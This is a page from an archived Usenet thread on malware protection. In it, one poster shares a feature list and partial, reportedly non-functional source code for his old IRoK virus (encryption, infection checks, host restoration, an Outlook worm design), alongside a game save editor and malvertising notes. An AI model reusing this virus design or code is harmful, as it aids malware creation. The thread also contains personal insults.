I got a pirate copy of Vista that won't accept updates--what's the best form of protection... - Page 4

Do you have a question? Post it now! No Registration Necessary.  Now with pictures!

Threaded View

Re: I got a pirate copy of Vista that won't accept updates--what's the best form of protection?


Quoted text here. Click to load it

I don't program much in interpreted languages. I tend to code in
compiled languages and/or assembler outright.

I'm not a script kiddy, never have been. Didn't like not being in
control of the hardware... I'm old school and that spoiled me.

I can only produce documentation, I won't fork you any binaries of my
work that's harmful nor will I provide you functional source code. OTH,
If you want to see a partial non functional piece or something, I'd be
willing to do that.

I'll share some routines from irok v1.1c source code. You won't be able
to abuse it. :) And that's all I'm giving you. Enough proof fuckface?

rem [IRoK] version 1.1c
rem A creation of Raid [SLAM] (co 420 productions)
rem You will require Asic v5 and the irok.lib in order to
rem compile this source code into a functional virus.
rem Goodies:
rem ž Exe/com infection by prepending.
rem ž AntiAvfuck(tm) encryption on infected executables.
rem ž AntiAV: Vsafe/Vshield, Norton Resident blocker Disable
rem ž The virus will sleep between 3pm- 5pm, Only host operation, No
infect
rem ž If it's 21 minutes at the hour; IROK will say hello
rem ž Cross-OS compatable. Dos/Win/os2 exe/coms can be infected!
rem ž Travels via IRC using mIRC client [irok.exe]
rem ž IRoK may decide to fuck with the infected user. if current
rem   time is equal to 17 minutes, Irok might rename all directory
rem   entries from root on the current drive to high ascii characters.
rem   This causes much hassle for NTFS file systems.
rem ž Irok can also travel as a worm via Microsoft Outlook programs.
rem   if the user has this program installed, Irok will attempt to
spread
rem   by creating an irokrun.vbs file which will tell outlook to send
rem   a letter (created by the vbs file) and irok.exe as an attachment.
the
rem   letter invites the user into running the file. The sending
computer
rem   user is not informed at any time he/she is sending any email. The
rem   addresses are taken (65) from his/her address book. Once a send
rem   of the emails has been completed, all traces of it are erased from
rem   the sending machine. The vbs file will self delete once it has
finished
rem   running, leaving no trace of it on the host machine.
rem Allocate memory for the virus binary and encryption buffer.
rem Size is set as virus binary/2
dim virus_data(3921)
dim host_data(3921)


cypher_host:
rem changed it a little again. Fuck you frisk.
y=varptr(host_data(0))
z=y+virus_size
e=varptr(virus_data(0))
key=newdate
r=e
for x=y to z
a=peek(x)
b=peek(r)
ax=a
bx=key
gosub cpu_xor:
bx=b
gosub cpu_xor:
poke x,ax
key=key-virus_size
ax=key
bx=newtime
gosub cpu_xor:
key=bx
r=r+1
next x
return

infect_check:
rem routine checks for files to avoid, size validation and to make
rem sure the file is not already infected. If any of the routines
rem return infected=1 then the rest of the file  i/o does not
rem occur (saves a few miliseconds i/o time)
infected=0
gosub do_not_touch:
if infected=0 then
gosub size_check:
endif
if infected=0 then
gosub prev_check:
endif
return

prev_check:
rem Is this file already infected?
getem=0
gosub pre_open:
sig$="    "
gosub open_file:
move_way&=28
gosub move_file_pointer:
dx=varptr(sig$)
bytesize=4
gosub read_file:
gosub close_file:
getem=1
gosub pre_open:
if sig$="1234" then
infected=1
endif
if file_handle<5 then
rem We couldn't open the damn file to check, assume it is indeed
rem infected. and let's not fool with it. :)
infected=1
endif
return

cpu_xor:
rem Shrug, asic has no built in XOR routine, so we
rem chat with the CPU ourselves to XOR it :)
SETREGS (AX,BX,NA,NA,NA,NA,NA,NA,NA)
CODE &HEX31, &HEXD8
GETREGS (AX,NA,NA,NA,NA,NA,NA,NA,NA)
rem ENd of cpu-xor chat
return

virus_disinfect:
rem Remove our viral code from the host, and restore to the host's
previous
rem state. Use name extension masking. [This evades most dos/win mem-res
rem behavior blockers] Host is named in filename$ setting before call is
rem made to this routine. Important! You must have a copy of the virus
body
rem previous loaded into the arrays *before* calling this routine.
Failure
rem to do so will certainly result in corruption of file contents.
target=0
gosub hide_host:
hostsize&=filelen(filename$)
getem=0
gosub pre_open:
gosub open_file:
gosub get_fdt:
hosttemp&=hostsize&-virus_size&
move_way&=hosttemp&
gosub move_file_pointer:
bytesize=virus_size
dx=varptr(host_data(0))
gosub read_file:
move_way&=0&
gosub move_file_pointer:
gosub cypher_host:
dx=varptr(host_data(0))
bytesize=virus_size
gosub write_file:
if byteswritten=virus_size then
clear_to_run=1
endif
gosub set_fdt:
gosub close_file:
gosub strip_garbage:
getem=1
gosub pre_open:
gosub res_host:
return

rem ***Strip appended encrypted host data from disinfected host.

strip_garbage:
rem This routine quickly scrapes off the appended data
rem we wrote during the infection process
gosub open_file:
move_way&=hosttemp&
gosub move_file_pointer:
dx=0
bytesize=0
gosub write_file:
gosub set_fdt:
gosub close_file:
return



--
Things look bad from over here. Too much confusion and no solution.
Everyone here knows your fear. Your out of touch and you try too much.
Yesterdays glory will help us today. You wanna retire? Get outta the
way. I ain't got much time. Young ones close behind. I can't wait in
line.


Re: I got a pirate copy of Vista that won't accept updates--what's the best form of protection?

On Tuesday, July 24, 2012 7:38:41 PM UTC-4, Dustin wrote:
 
Quoted text here. Click to load it

Not enough proof.  Post a simple program and comment it--in the other thread
please--with all the rem's you want.  And include the subroutines 'gosub' unlike
what you did here.

I am only replying in the other thread--this one is too busy.

RL

Re: I got a pirate copy of Vista that won't accept updates--what's the best form of protection?


Quoted text here. Click to load it

What do I think is used? Or what do I know for a fact is primarily used?
Listen, do you trust Kurts advice or not? If you do, then why continue to
question me?


--
Things look bad from over here. Too much confusion and no solution.
Everyone here knows your fear. Your out of touch and you try too much.
Yesterdays glory will help us today. You wanna retire? Get outta the way.
I ain't got much time. Young ones close behind. I can't wait in line.


Re: I got a pirate copy of Vista that won't accept updates--what's the best form of protection?

"Dustin" wrote:

Quoted text here. Click to load it

C may be unsuitable in some situations but it isn't bloated. It's more
like a high level assembler. I write utilities in C and they are very
compact and fast.



Re: I got a pirate copy of Vista that won't accept updates--what's the best form of protection?


Quoted text here. Click to load it
 
C isn't really that much like a high level assembler. While compact and
fast, they're excessive if compared to the same app written entirely in
assembler. All HLL's waste bytes. they have presetups;runtimes, etc.

C is not very suitable for writing viruses. Trojan based malware, sure,
anything will do.. but not really good for viruses.

 



--
Things look bad from over here. Too much confusion and no solution.
Everyone here knows your fear. Your out of touch and you try too much.
Yesterdays glory will help us today. You wanna retire? Get outta the way.
I ain't got much time. Young ones close behind. I can't wait in line.


Re: I got a pirate copy of Vista that won't accept updates--what's the best form of protection?

"Dustin" wrote:

Quoted text here. Click to load it

Ask about that in comp.programming!

Quoted text here. Click to load it

That depends on how you compile and link them.

Quoted text here. Click to load it

But you wrote yours in a variant of Basic; not pure asm.



Re: I got a pirate copy of Vista that won't accept updates--what's the best form of protection?


Quoted text here. Click to load it

I wouldn't even go so far as to say it was a variant of BASIC...
As, almost all other basic like languages I've ever used had alot more
built in functionality and weren't so initially limited.

As far as pure asm is concerned, nothing I released into the world was
pure asm no. I did finish a couple that were pure asm, but irok was the
last outbound virus from this end.

While none of the released ones were pure asm, they all contained some
pure assembler functions. I wrote them intentionally in asic you know...
the built in anti-hueristics for the time was useful.



--
Things look bad from over here. Too much confusion and no solution.
Everyone here knows your fear. Your out of touch and you try too much.
Yesterdays glory will help us today. You wanna retire? Get outta the way.
I ain't got much time. Young ones close behind. I can't wait in line.


Re: I got a pirate copy of Vista that won't accept updates--what's the best form of protection?


Quoted text here. Click to load it

It should go without saying, but I can't provide you source code to
malicious software. I'd be in violation of the antimalware community and
would actually get in trouble for that. So, that's a no go. :)

About the best I can provide is writeups by antivirus companies for some
of the things my peers and myself wrote back in the day. No source, No
binaries. it wouldn't be ethical.




--
Things look bad from over here. Too much confusion and no solution.
Everyone here knows your fear. Your out of touch and you try too much.
Yesterdays glory will help us today. You wanna retire? Get outta the way.
I ain't got much time. Young ones close behind. I can't wait in line.


Re: I got a pirate copy of Vista that won't accept updates--what's the best form of protection?

On Tuesday, July 24, 2012 12:50:30 AM UTC-4, Dustin wrote:
Quoted text here. Click to load it

Right.  I'll try and be nice and professional about this.  Please provide a=
 simple example --preferably in C--of something you understand (not even wr=
ote, just understand) that demonstrates a virus.  Email me or better yet po=
st it here.  It can be a fragment and just to make it easy it can be pseudo=
code.  If and when we get to this point let's continue this discussion, but=
 if we can't get to this point let's stop.  I'm beginning to see that you'r=
e like a certain dude that took my online flaming too personally (yes, I us=
e this account to flame) and bombarded me with several thousand spam emails=
.  One email to his ISP put an end to that (and got him into trouble with h=
is university--yes he was a student) but I don't want to go down that road =
with you.  If you're here to role play and play Dungeons & Dragons online b=
y all means continue to do so, I'm going to drop out.  If you're a serious =
programmer or coder as you claim, show me what you got, in pseudo code.  BT=
W--I have reference books on how to write viruses and intend to run whateve=
r you show me past these references--so it will be hard to fake it.  And I =
also code myself.

I doubt btw I'll hear from you given this very concrete challenge Dustin.  =
So therefore, let's just say "it was nice knowing you".=20

Bye,

Ray

Re: I got a pirate copy of Vista that won't accept updates--what's the best form of protection?


Quoted text here. Click to load it

I already did that for you. I shared sections of source code to irok
v1.1c. It's uncompilable and incomplete as posted. Malicious routines
weren't shared. I didn't share the file i/o calls either. You won't be
able to craft anything malicious from my share.

Quoted text here. Click to load it

I'm not faking anything. I've posted snippits to this:
http://www.f-secure.com/v-descs/irok.shtml
 
Quoted text here. Click to load it

I accept your challenge. :)


--
Things look bad from over here. Too much confusion and no solution.
Everyone here knows your fear. Your out of touch and you try too much.
Yesterdays glory will help us today. You wanna retire? Get outta the
way. I ain't got much time. Young ones close behind. I can't wait in
line.


Re: I got a pirate copy of Vista that won't accept updates--what's the best form of protection?


Quoted text here. Click to load it

Hi Ray...


I accept your challenge.


--
Things look bad from over here. Too much confusion and no solution.
Everyone here knows your fear. Your out of touch and you try too much.
Yesterdays glory will help us today. You wanna retire? Get outta the
way. I ain't got much time. Young ones close behind. I can't wait in
line.


Re: I got a pirate copy of Vista that won't accept updates--what's the best form of protection?


Quoted text here. Click to load it

Here's a harmless app I wrote for Duke nukem! The side scroller, not the
3d version...

Complete source. It's really old, so excuse the sloppyness. i'm self
taught.

d1$=chr$(10)
passed=0
main1:
color 15,0
print"DnHaCK v1.0į (saved game editor) - Coded By: RustBug"
print"Works with Duke Nukem (v2.0) episodes 1 2 and 3"
print"program written and compiled on 10/11/97 2:17am"
print"ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ"
if passed=1 then
print"              Working on [";
print begi$;
print"]"
print"             Episode: ";
print epi$;
print"  Saved Game: ";
print saved$
else
color 7,0
print" "
print"Which Episode (1-3): ";
legal1=48
legal2=52
call sub "securekey" legal1,legal2,a$
print a$
epi$=a$
endi$=".dn"
endi$=endi$+a$
print"Which Saved Game (1-9): ";
legal1=48
legal2=58
call sub "securekey" legal1,legal2,a$
print a$
saved$=a$
begi$="saved"
begi$=begi$+a$
begi$=begi$+endi$
print"ž Loading [";
begi$=ucase$(begi$)
print begi$;
print"]...";
open"r",1,begi$
if error>0 then
print"Can't find/open!"
goto bye:
end
endif
a=filepos(1,8)
input #1,world$ BYTE
a=filepos(1,16)
input #1,health$ BYTE
a=filepos(1,12)
input #1,boots$ BYTE
a=filepos(1,14)
input #1,claw$ BYTE
a=filepos(1,18)
input #1,hand$ BYTE
a=filepos(1,10)
input #1,gun$ BYTE
a=filepos(1,44)
input #1,score$ NONULL
close 1
open"r",1,begi$
a=filepos(1,44)
print#1,"" NONULL
close 1

print"Done!"
passed=1
endif

color 15,0
print"ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ"
color 7,0
print"[A] Level.: ";
level=1
temp$=world$
gosub fix_str:
print a$;
level=0
a=len(a$)
if a<2 then
print" ";
endif
print"  - Legal Values 0-11 (12 levels)"
print"[B] Health: ";
temp$=health$
gosub fix_str:
print a$;
a=len(a$)
if a<3 then
print" ";
endif
if a<2 then
print" ";
endif
print" - Legal Values 1-8  (255 for invinsibility)"
print"[C] Gun...: ";
temp$=gun$
gosub fix_str:
print a$;
print"   - Legal Values 1-4"
print"[D] Score.: ";
score1=instr(score$,d1$)
score1=score1-1
score1$=left$(score$,score1)
print score1$

print"[E] Boots.: ";
temp$=boots$
boots=1
gosub yes_no:
boots=0
print a$
print"[F] Claw..: ";
temp$=claw$
gosub yes_no:
print a$
print"[G] Hand..: ";
temp$=hand$
gosub yes_no:
print a$
print"[H] Save changes and exit"
print" "
print"[DnHaCK]: ";
legal1=64
legal2=73
call sub "securekey" legal1,legal2,a$

if a$="A" then
print"ž Level Edit"
color 15,0
print"ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ"
print"Level 0 is where you start out when selecting a new "
print"game. Some episodes even on level 11, will make you"
print"enter another door, leading to the end guy."
print"ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ"
color 7,0
print"Enter new level (0-11): ";
call sub "secureinput" temp$,secinp
min=-1
max=12
level=1
gosub refix:
level=0
if safe=1 then
world$=temp$
endif
endif

if a$="B" then
print"ž Health Edit"
color 15,0
print"ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ"
print"Your health ranges from 1 (critical, one hit you die)"
print"to 8 (full). You can be for most purposes unkillable"
print"if you use value 255, and do NOT get any health items"
print"during gameplay. This will not save you if you throw"
print"yourself into one of those pesky generators."
print"ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ"
color 7,0

print"Enter new health: ";
call sub "secureinput" temp$,secinp
min=0
max=256
gosub refix:
if safe=1 then
health$=temp$
endif
endif

if a$="C" then
print"ž Gun Energy Edit"
color 15,0
print"ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ"
print"Your gun ranges from level 1 (you start out at this)"
print"to level 4 (being the most powerful)."
print"ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ"
color 7,0

print"Enter new gun level (1-4): ";
call sub "secureinput" temp$,secinp
min=0
max=5
gosub refix:
if safe=1 then
gun$=temp$
endif
endif

if a$="D" then
print"ž Score Edit (cheater..heh)"
color 15,0
print"ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ"
print"Game score only has 8 places. ie: 12345678. If you go"
print"beyond this, it will look like you rolled the score."
print"but, once you either beat or quit the game, You'll"
print"see you didn't roll it, your score just got so big"
print"it doesn't show all of it in the game. If you don't"
print"want to be incredibly lame, press enter and your"
print"score won't be touched."
print"ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ"
color 7,0

print"Enter new score: ";
call sub "secureinput" score1$,secinp
if score1$<>"" then
score$=score1$+d1$
endif
endif

if a$="E" then
print"ž Boot Edit"
color 15,0
print"ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ"
print"Boots let you jump higher then normal. There needed"
print"on higher levels, but you can enjoy them on lower"
print"ones now too. :-)"
print"ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ"
color 7,0

temp$="boots"
gosub on_off:
boots$=temp$
endif

if a$="F" then
print"ž Claw Edit"
color 15,0
print"ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ"
print"The claw allows you to grasp onto platforms on later"
print"levels to move around, and even climb. It's useless"
print"on levels without special teeth-like platforms."
print"ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ"
color 7,0

temp$="claw"
gosub on_off:
claw$=temp$
endif

if a$="G" then
print"ž Hand Edit"
color 15,0
print"ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ"
print"The hand is one of the seldom used items. Its only"
print"purpose is to act like an access key. Making bridges"
print"and not triggering a booby-trap."
print"ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ"
color 7,0

temp$="hand"
gosub on_off:
hand$=temp$
endif

if a$="H" then
print"Exiting..."
print"ž Writing Changes...";
open"r",1,begi$
a=filepos(1,8)
print #1,world$
a=filepos(1,16)
print #1,health$
a=filepos(1,12)
print #1,boots$
a=filepos(1,14)
print #1,claw$
a=filepos(1,18)
print #1,hand$
a=filepos(1,10)
print #1,gun$
a=filepos(1,44)
print #1,score$ NONULL
close 1
print"Done!"

bye:
print"Questions? Comments? Email me: RustBug@juno.com"
end
endif
goto main1:

fix_str:
rem converts the byte into a normal number for the user
a=asc(temp$)
if level=1 then
rem Adjust for hex-offset level
if a>9 then
a=a-6
endif
endif
a$=str$(a)
a$=ltrim$(a$)
return

yes_no:
a=asc(temp$)
if boots=1 then
b$="them."
else
b$="it."
endif
if a=0 then
a$="You don't have "
else
a$="You have "
endif
a$=a$+b$
return

refix:
safe=0
if temp$="" then
return
endif
a=val(temp$)
if a>min then
if a<max then
if level=1 then
if a>9 then
a=a+6
endif
endif
temp$=chr$(a)
safe=1
endif
endif
return

on_off:
print"Do you want the ";
print temp$;
print" (0=no/1=yes): ";
legal1=47
legal2=50
call sub "securekey" legal1,legal2,a$
a=val(a$)
if a=1 then
print"Yes!"
else
print"No!"
endif
temp$=chr$(a)
return

I reverse engineered the saved game states to learn which bytes to
toggle for the desired effects.. then, I wrote that to do it for people
who don't have a hex editor, or don't wanna try using one...

That was in 1997... :)

It's a basic syntax like language, called Asic. It ceased development in
1994. I'm well versed in it, many other dialecs, c,c++, assembler, and
various other ancient/no longer used compiled languages.

I'm okay with html/java/javascript.. Messing with ajax some.



--
Things look bad from over here. Too much confusion and no solution.
Everyone here knows your fear. Your out of touch and you try too much.
Yesterdays glory will help us today. You wanna retire? Get outta the
way. I ain't got much time. Young ones close behind. I can't wait in
line.


Re: I got a pirate copy of Vista that won't accept updates--what's the best form of protection?

On Sunday, July 22, 2012 2:17:01 AM UTC-4, kurt wismer wrote:
=20
Quoted text here. Click to load it
ow&#39; just scratches the surface. it&#39;s a superficial answer. we all h=
ave basic human needs, sometimes those needs aren&#39;t fulfilled, and some=
times the strategies we use to correct that don&#39;t work. reflection and =
self-knowledge may reveal strategies untested and opportunities unseen. thi=
nk about it.

***

Wise counsel, but let Dustin burn out if he wants, as long as he doesn't ta=
ke out a bunch of people going down with him, like in Aurora, CO.  He could=
 have mental problems, not uncommon as one gets older.  Let sleeping dogs l=
ie.  Reminds me I should butter him up then stop teasing him.  He's liable =
to go off on me and start cyberstalking me or something weird.

BTW I did start this thread as a bit of a troll but actually learned someth=
ing from it...it's kind of interesting to me since I don't spend much time =
in this field (ergo it's all new and interesting).

Of interest is that after reading through this thread including stuff that =
you and FromTheRafters posted, I concluded that 'accidentally clicking' on =
a link from a compromised site (whether that site is compromised from SQL i=
njection on its main page or the adware site that supplies the adverts in t=
he border of a legitimate website page) and exploits in Adobe/Microsoft are=
 what can cause Java type malware to get on your system.

So with that thought in mind I'm researching: what AV s/w best protects web=
 browsing?  Strangely, not found much, but perhaps I'm not phrasing the que=
stion correctly. For example MBAM or whatever (Malwarebytes Anti-Malware), =
does it protect web surfing or not?  I see Trend Micro 2012 does (blurb bel=
ow) and an old McAfee product from 2007 does.... but need more info and won=
der whether I can get a 'pure web browser' protector so it can coexist alon=
gside my free Microsoft Security Essentials (given that I've heard that two=
 AV programs should not run in parallel)...or whether I should go all in wi=
th Trend Micro, which 'fails' static tests a bit worse than MSE, but is app=
arently better at stopping 'dynamic' (new virus or malware) stuff.

RL


********
A malvertisement (malicious advertisement) is an advertisement on the Inter=
net that is capable of infecting the viewer's computer with malware. Accord=
ing to the network security company Blue Coat Systems Inc., malvertising is=
 the current computer hijacking technique of choice for organized crime. Co=
mpromised computers can be used to create powerful botnets that can be used=
 to carry out identity theft, corporate espionage or other nefarious activi=
ty.

Malvertisements are commonly placed on a website in one of these two ways:=
=20

Legitimate advertisements: Initially, a criminal may place a series of malw=
are-free advertisements on a trusted site that runs third-party ads and lea=
ve them alone for several months in order to establish a good reputation.

Later on, the criminal will inject a malicious payload into the ad, infecti=
ng as many computers as possible in a short amount of time before removing =
the malicious code or discontinuing the ad.  This type of attack is often r=
un on websites that run third-party ads. By infiltrating popular syndicated=
 online ad services, thousands of sites can be infected at once. Unfortunat=
ely, websites that run third-party ads can do little to protect their visit=
ors because syndicated ads are not under their direct control. In fact, the=
 company from whom they receive the ads may use ads from other publishers, =
so the original source of the advertisements can be several parties removed=
.

Pop-up ads:  A pop-up ad can deliver a malicious payload as soon as the ad =
appears on the viewer=92s screen.

*******=20
At one time, users were victimized by malvertisements
pointing to malicious sites while browsing through a popular
webmail service provider=92s site. In this attack, one particular
ad redirected victims to a vulnerability exploit-laden site.
Users who landed on the site the ad pointed to
unknowingly downloaded two Trojans disguised as
.PDF files onto their systems and executed a
malicious JavaScript.

After careful analysis, TrendLabs engineers found that the malicious .PDF f=
iles
exploited several vulnerabilities in Adobe Reader and Acrobat while the mal=
icious
JavaScript exploited a bug in Microsoft Virtual Machine (VM). Successful
exploitation of the said bugs all led to the download of more malicious fil=
es onto
already-infected systems, putting affected users at even greater risk.


Trend Micro Titanium Antivirus+ 2012=20
=20
Trend Micro Titanium Antivirus+ 2012 : Dangerous Page
Trend Micro aims to block malware before it ever arrives at your system. It=
 checks each Web page the user visits and blocks access to any that host ma=
lware or are involved in fraud.=20

Trend Micro Titanium Antivirus+ 2012 : Phishing Site Blocked
The page that appears in place of a phishing site is just the same as what =
you'll see if you accidentally visit a site that hosts malware.

Re: I got a pirate copy of Vista that won't accept updates--what's the best form of protection?


Quoted text here. Click to load it

You've been asking that... Hows the efforts with a suitable answer coming
so far for you? :)

You think you're sly Ray, but you aren't.

Quoted text here. Click to load it

Visit it's website, lazy fuck.

--
I don't need no arms around me. And I dont need no drugs to calm me. I
have seen the writing on the wall. Don't think I need anything at all. No!
Don't think I'll need anything at all. All in all it was all just bricks
in the wall. All in all you were all just bricks in the wall.
Pink Floyd Another Brick in the Wall part 3

Re: I got a pirate copy of Vista that won't accept updates--what's the best form of protection?


Quoted text here. Click to load it

You. :)

Quoted text here. Click to load it

That's a shame.
 
Quoted text here. Click to load it

You're the expert.
 
Quoted text here. Click to load it

Whatever you think I'm sure is fine from here.
 


--
I called the help line. It was outsourced to Pakistan.
"What's the matter?"  
"I'm depressed."
"Can you drive a truck?"


Re: I got a pirate copy of Vista that won't accept updates--what's the best form of protection?

On Tuesday, July 17, 2012 10:25:15 AM UTC-4, Dustin wrote:
Quoted text here. Click to load it

Gee thanks.  With 'advice' like that, why do I bother posting?

RL

Re: I got a pirate copy of Vista that won't accept updates--what's the best form of protection?


Quoted text here. Click to load it

I really don't know. I ask myself that very same question from time to
time. You're alot smarter than anyone else here. I'm surprised you have
questions. That the answers just don't come to you.


--
I called the help line. It was outsourced to Pakistan.
"What's the matter?"  
"I'm depressed."
"Can you drive a truck?"


Re: I got a pirate copy of Vista that won't accept updates--what's the best form of protection?


Quoted text here. Click to load it

Amen to that!!
Buffalo  :D



Re: I got a pirate copy of Vista that won't accept updates--what's the best form of protection?

On Tuesday, July 17, 2012 6:14:41 PM UTC-4, Dustin wrote:
Quoted text here. Click to load it

True, even a big shot like me needs a yes man like you!  But it's lonely at the
top.

RL

Re: I got a pirate copy of Vista that won't accept updates--what's the best form of protection?


Quoted text here. Click to load it

You can always script yourself a friend, Ray.


--
I called the help line. It was outsourced to Pakistan.
"What's the matter?"  
"I'm depressed."
"Can you drive a truck?"


Site Timeline